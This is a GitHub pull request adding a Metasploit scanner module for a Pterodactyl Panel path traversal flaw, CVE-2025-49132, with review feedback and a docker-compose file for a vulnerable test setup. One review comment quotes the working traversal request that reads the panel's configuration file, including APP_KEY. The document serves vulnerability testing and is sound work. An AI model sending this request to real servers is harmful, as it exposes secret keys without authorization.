Skip to content

Add auxiliary module for Pterodactyl Panel CVE-2025-49132 #20779

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom
Open
n05ec wants to merge 5 commits into
base: master
Choose a base branch
from
Open

Add auxiliary module for Pterodactyl Panel CVE-2025-49132 #20779

n05ec wants to merge 5 commits into from
+146 −0

Conversation

@n05ec
Copy link

@n05ec n05ec commented Dec 16, 2025

Description

This PR adds an auxiliary scanner module for CVE-2025-49132, a path traversal vulnerability in Pterodactyl Panel. The vulnerability allows unauthenticated attackers to read the configuration file (including APP_KEY) via the /locales/locale.json endpoint.

Verification

  • Start msfconsole
  • use auxiliary/scanner/http/pterodactyl_traversal_cve_2025_49132
  • set RHOSTS <vulnerable_ip>
  • run
  • Verify that the module detects the vulnerability and reports it.

@github-actions
Copy link

github-actions bot commented Dec 16, 2025

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

bcoles
bcoles reviewed Dec 16, 2025
View reviewed changes
modules/auxiliary/scanner/http/pterodactyl_traversal_cve_2025_49132.rb Outdated

register_options(
[
OptString.new('TARGETURI', [true, 'The target URI', '/locales/locale.json?locale=..%2F..%2Fconfig&namespace=app']),
Copy link
Contributor

@bcoles bcoles Dec 16, 2025

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Rather than force the user to manually perform both the traversal and the URL encoding themselves, the typical approach is to expose a FILENAME option (or similar) and a DEPTH option to specify the traversal depth. You can find many example modules with grep DEPTH modules/auxiliary/.

@n05ec
Copy link
Author

n05ec commented Dec 17, 2025

@bcoles I have updated the module based on your feedback:

  1. Refactored the code to use DEPTH and FILE options instead of hardcoded URIs.
  2. Added the missing documentation file following the official template.
  3. Verified the module works locally with the new logic.

Please review it again. Thanks!

jheysel-r7
jheysel-r7 reviewed Dec 18, 2025
View reviewed changes
documentation/modules/auxiliary/scanner/http/pterodactyl_traversal_cve_2025_49132.md
This module exploits a path traversal vulnerability (CVE-2025-49132) in Pterodactyl Panel versions prior to the fixed release.
The vulnerability exists in the `/locales/locale.json` endpoint. It allows an unauthenticated attacker to manipulate the `locale` parameter to traverse directories and read arbitrary files on the server (e.g., configuration files containing sensitive keys).

To set up a vulnerable environment, you can install an older version of Pterodactyl Panel using the standard installation scripts or Docker, ensuring you do not apply the patch for CVE-2025-49132.
Copy link
Contributor

@jheysel-r7 jheysel-r7 Dec 18, 2025

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

If you setup Pterodactyl Panel using docker would you be able to paste the docker-compose.yml / Dockerfile here?

Copy link
Author

@n05ec n05ec Dec 19, 2025

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Sure, I have applied the suggested change.

Here is the docker-compose.yml I used to set up the vulnerable environment (Pterodactyl Panel v1.11.10).

version: '3.8'
services:
  database:
    image: public.ecr.aws/docker/library/mariadb:10.5
    restart: always
    environment:
      MYSQL_DATABASE: panel
      MYSQL_USER: pterodactyl
      MYSQL_PASSWORD: password
      MYSQL_ROOT_PASSWORD: root_password
    volumes:
      - db_data:/var/lib/mysql
    healthcheck:
      test: ["CMD", "healthcheck.sh", "--connect", "--innodb_initialized"]
      interval: 10s
      timeout: 5s
      retries: 3
      start_period: 30s

  cache:
    image: public.ecr.aws/docker/library/redis:alpine
    restart: always

  panel:
    image: ghcr.io/pterodactyl/panel:v1.11.10
    ports:
      - "80:80"
    environment:
      DB_HOST: database
      DB_DATABASE: panel
      DB_USERNAME: pterodactyl
      DB_PASSWORD: password
      REDIS_HOST: cache
      APP_URL: "http://localhost"
      APP_ENV: "local"
      APP_DEBUG: "true"
      APP_SERVICE_AUTHOR: "[email protected]"
      APP_TIMEZONE: "Asia/Shanghai"
    depends_on:
      database:
        condition: service_healthy
      cache:
        condition: service_started
    volumes:
      - panel_data:/app/var/

volumes:
  db_data:
  panel_data:

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

@bcoles bcoles bcoles left review comments

@jheysel-r7 jheysel-r7 jheysel-r7 left review comments

At least 1 approving review is required to merge this pull request.

Assignees

No one assigned

Labels

module needs-docs

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

3 participants

@n05ec @bcoles @jheysel-r7